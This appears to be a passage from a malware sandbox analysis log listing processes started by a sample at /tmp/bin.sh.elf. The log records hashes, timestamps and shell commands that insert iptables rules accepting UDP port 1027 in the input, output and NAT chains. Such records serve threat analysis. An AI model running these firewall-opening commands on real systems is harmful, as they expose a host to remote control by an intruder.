                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:20
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p udp --destination-port 1027 -j ACCEPT"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:20
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:20
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I INPUT -p udp --destination-port 1027 -j ACCEPT
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:20
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:20
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --source-port 1027 -j ACCEPT"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:20
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:20
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I OUTPUT -p udp --source-port 1027 -j ACCEPT
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:20
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:20
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 1027 -j ACCEPT"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:20
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:20
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I PREROUTING -t nat -p udp --destination-port 1027 -j ACCEPT
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:20
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:20
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 1027 -j ACCEPT"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:20
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:20
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I POSTROUTING -t nat -p udp --source-port 1027 -j ACCEPT
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:20
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:20
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p udp --dport 1027 -j ACCEPT"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:21
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:21
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I INPUT -p udp --dport 1027 -j ACCEPT
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:21
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:21
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --sport 1027 -j ACCEPT"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:21
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:21
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I OUTPUT -p udp --sport 1027 -j ACCEPT
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:21
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:21
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 1027 -j ACCEPT"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:21
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:21
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I PREROUTING -t nat -p udp --dport 1027 -j ACCEPT
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:21
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:21
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 1027 -j ACCEPT"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:21
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:21
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I POSTROUTING -t nat -p udp --sport 1027 -j ACCEPT
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af